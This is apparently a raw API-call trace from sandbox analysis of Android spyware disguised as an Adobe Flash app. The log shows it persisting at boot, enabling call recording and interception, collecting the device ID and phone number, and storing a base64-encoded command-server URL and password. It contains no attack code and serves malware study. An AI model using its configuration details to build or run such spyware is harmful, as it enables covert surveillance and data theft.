D/S4URC   ( 3739): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.net.HttpURLConnection]
D/S4URC   ( 3739): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.okhttp.internal.http.HttpURLConnectionImpl]
D/S4URC   ( 3739): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.net.Socket]
D/S4URC   ( 3739): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.telephony.TelephonyManager]
D/S4URC   ( 3739): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.os.Debug]
D/S4URC   ( 3739): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.hardware.SensorManager]
D/S4URC   ( 3739): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.res.ResourcesKey]
D/S4URC   ( 3739): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.ResourcesManager]
D/S4URC   ( 3739): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/app/com.adobe.flash13-1/base.apk]
D/S4URC   ( 3739): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.adobe.flash13]
D/S4URC   ( 3739): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.adobe.flash13/cache]
D/S4URC   ( 3739): [SDK] [java.io.File] [mkdirs] [FilePath][String] [/data/data/com.adobe.flash13/cache]
D/S4URC   ( 3739): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.adobe.flash13/cache]
D/S4URC   ( 3739): [SDK] [android.app.Activity][onCrate] [Class][ComponentInfo{com.adobe.flash13/com.connect.Dendroid}]
D/S4URC   ( 3739): [SDK] [android.app.ActivityManager] [getRunningServices]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper] [registerReceiver][IntentFilter][android.intent.action.BOOT_COMPLETED,android.intent.action.SCREEN_OFF,
D/S4URC   ( 3739): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.adobe.flash13]
D/S4URC   ( 3739): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs]
D/S4URC   ( 3739): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml]
D/S4URC   ( 3739): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml.bak]
D/S4URC   ( 3739): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3739): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml.bak]
D/S4URC   ( 3739): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml]
D/S4URC   ( 3739): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][putLong] [Key][inacall] [Value][0]
D/S4URC   ( 3739): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml]
D/S4URC   ( 3739): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml]
D/S4URC   ( 3739): [SDK] [java.io.File] [getParent] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml]
D/S4URC   ( 3739): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs]
D/S4URC   ( 3739): [SDK] [java.io.File] [mkdir] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs]
D/S4URC   ( 3739): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs]
D/S4URC   ( 3739): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml]
D/S4URC   ( 3739): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml.bak]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][commit]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][getInt] [Int][Timeout] [Return][0]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][putInt] [Key][Timeout] [Value][10000]
D/S4URC   ( 3739): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml]
D/S4URC   ( 3739): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml.bak]
D/S4URC   ( 3739): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml] [DesFile][/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml.bak]
D/S4URC   ( 3739): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml]
D/S4URC   ( 3739): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml.bak]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][commit]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][getBoolean] [Boolean][RecordCalls] [Return][false]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][getBoolean] [Boolean][RecordCalls] [Return][false]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][putBoolean] [Key][RecordCalls] [Value][true]
D/S4URC   ( 3739): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml]
D/S4URC   ( 3739): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml.bak]
D/S4URC   ( 3739): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml] [DesFile][/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml.bak]
D/S4URC   ( 3739): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml]
D/S4URC   ( 3739): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml.bak]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][commit]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][getBoolean] [Boolean][intercept] [Return][false]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][getBoolean] [Boolean][intercept] [Return][false]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][putBoolean] [Key][intercept] [Value][false]
D/S4URC   ( 3739): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml]
D/S4URC   ( 3739): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml.bak]
D/S4URC   ( 3739): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml] [DesFile][/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml.bak]
D/S4URC   ( 3739): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml]
D/S4URC   ( 3739): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml.bak]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][commit]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][AndroidID] [Return][]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][AndroidID] [Return][]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][putString] [Key][AndroidID] [Value][9dd4736125bf4d04]
D/S4URC   ( 3739): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml]
D/S4URC   ( 3739): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml.bak]
D/S4URC   ( 3739): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml] [DesFile][/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml.bak]
D/S4URC   ( 3739): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml]
D/S4URC   ( 3739): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml.bak]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][commit]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][File] [Return][]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][File] [Return][]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3739): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0]
D/S4URC   ( 3739): [SDK] [android.os.Environment] [getExternalStorageDirectory] [DirectoryPath][String] [/storage/sdcard0]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][putString] [Key][File] [Value][/storage/sdcard0/System]
D/S4URC   ( 3739): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml]
D/S4URC   ( 3739): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml.bak]
D/S4URC   ( 3739): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml] [DesFile][/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml.bak]
D/S4URC   ( 3739): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml]
D/S4URC   ( 3739): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml.bak]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][commit]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][urlPost] [Return][]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][urlPost] [Return][]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][putString] [Key][urlPost] [Value][/message.php?]
D/S4URC   ( 3739): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml]
D/S4URC   ( 3739): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml.bak]
D/S4URC   ( 3739): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml] [DesFile][/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml.bak]
D/S4URC   ( 3739): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml]
D/S4URC   ( 3739): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml.bak]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][commit]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][backupURL] [Return][]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][backupURL] [Return][]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][putString] [Key][backupURL] [Value][aHR0cDovLzI3LjE1OS4xNTkuMjQ5OjkwOTYvRGVuZHJvaWQ=]
D/S4URC   ( 3739): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml]
D/S4URC   ( 3739): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml.bak]
D/S4URC   ( 3739): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml] [DesFile][/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml.bak]
D/S4URC   ( 3739): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml]
D/S4URC   ( 3739): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml.bak]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][commit]
D/S4URC   ( 3739): [SDK] [android.content.ContentResolver] [registerContentObserver] [URL][String] [content://settings/system/enable_stylus_gestures]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][getBoolean] [Boolean][Start] [Return][false]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][putBoolean] [Key][Start] [Value][true]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][putBoolean] [Key][Media] [Value][false]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][putBoolean] [Key][Files] [Value][false]
D/S4URC   ( 3739): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml]
D/S4URC   ( 3739): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml.bak]
D/S4URC   ( 3739): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml] [DesFile][/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml.bak]
D/S4URC   ( 3739): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml]
D/S4URC   ( 3739): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml.bak]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][commit]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][putString] [Key][URL] [Value][aHR0cDovLzI3LjE1OS4xNTkuMjQ5OjkwOTYvRGVuZHJvaWQ=]
D/S4URC   ( 3739): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml]
D/S4URC   ( 3739): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml.bak]
D/S4URC   ( 3739): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml] [DesFile][/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml.bak]
D/S4URC   ( 3739): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml]
D/S4URC   ( 3739): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml.bak]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][commit]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][putString] [Key][backupURL] [Value][aHR0cDovLzI3LjE1OS4xNTkuMjQ5OjkwOTYvRGVuZHJvaWQ=]
D/S4URC   ( 3739): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][commit]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][putString] [Key][password] [Value][cGFzc3dvcmQ=]
D/S4URC   ( 3739): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml]
D/S4URC   ( 3739): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml.bak]
D/S4URC   ( 3739): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml] [DesFile][/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml.bak]
D/S4URC   ( 3739): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml]
D/S4URC   ( 3739): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml.bak]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][commit]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][putString] [Key][androidId] [Value][9dd4736125bf4d04]
D/S4URC   ( 3739): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml]
D/S4URC   ( 3739): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml.bak]
D/S4URC   ( 3739): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml] [DesFile][/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml.bak]
D/S4URC   ( 3739): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml]
D/S4URC   ( 3739): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml.bak]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][commit]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][URL] [Return][aHR0cDovLzI3LjE1OS4xNTkuMjQ5OjkwOTYvRGVuZHJvaWQ=]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][password] [Return][cGFzc3dvcmQ=]
D/S4URC   ( 3739): [SDK] [android.telephony.TelephonyManager] [getLine1Number]
D/S4URC   ( 3739): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.OpenSSLSocketFactoryImpl]
D/S4URC   ( 3739): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.KeyManagerFactoryImpl]
D/S4URC   ( 3739): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.bouncycastle.jcajce.provider.keystore.bc.BcKeyStoreSpi$Std]
D/S4URC   ( 3739): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.OpenSSLRandom]
D/S4URC   ( 3739): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.TrustManagerFactoryImpl]
D/S4URC   ( 3739): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.TrustedCertificateKeyStoreSpi]
D/S4URC   ( 3739): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.bouncycastle.jce.provider.PKIXCertPathValidatorSpi]
D/S4URC   ( 3739): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/misc/keychain/pins]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][getInt] [Int][Timeout] [Return][10000]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
